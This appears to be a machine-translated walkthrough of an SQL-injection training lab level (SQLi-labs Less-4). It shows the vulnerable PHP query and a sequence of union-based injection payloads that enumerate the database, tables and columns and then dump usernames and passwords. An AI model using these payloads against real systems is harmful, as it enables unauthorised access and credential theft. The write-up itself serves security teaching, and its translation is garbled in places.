After opening the page prompts "Please input parameter id, and assign it a numeric value."
1, to find the injection point
? Id = 1 normal input; input id = 1 "error, indicating the presence sql injection vulnerability?.
View source backstage found the following query, and Less-3 based on false GET single quote character deformation injection difference is that the new building payload ") rather than double quotation mark closing parenthesis') single quotation mark closing parenthesis) right parenthesis shows a modification!
$id=$_GET['id']; $id = '"' . $id . '"'; $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
2, the number of fields in the query data in the table
? Input id = 1 ") order by 3 - + normal;
? Enter id = 1 ") order by 4 - + given, indicating the number of fields in the Table 3.
3, blasting database
?id=-1") union select 1,2,database() --+
4, the data table burst
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
5, the data burst column (field)
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
6, the value of the data burst
?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--
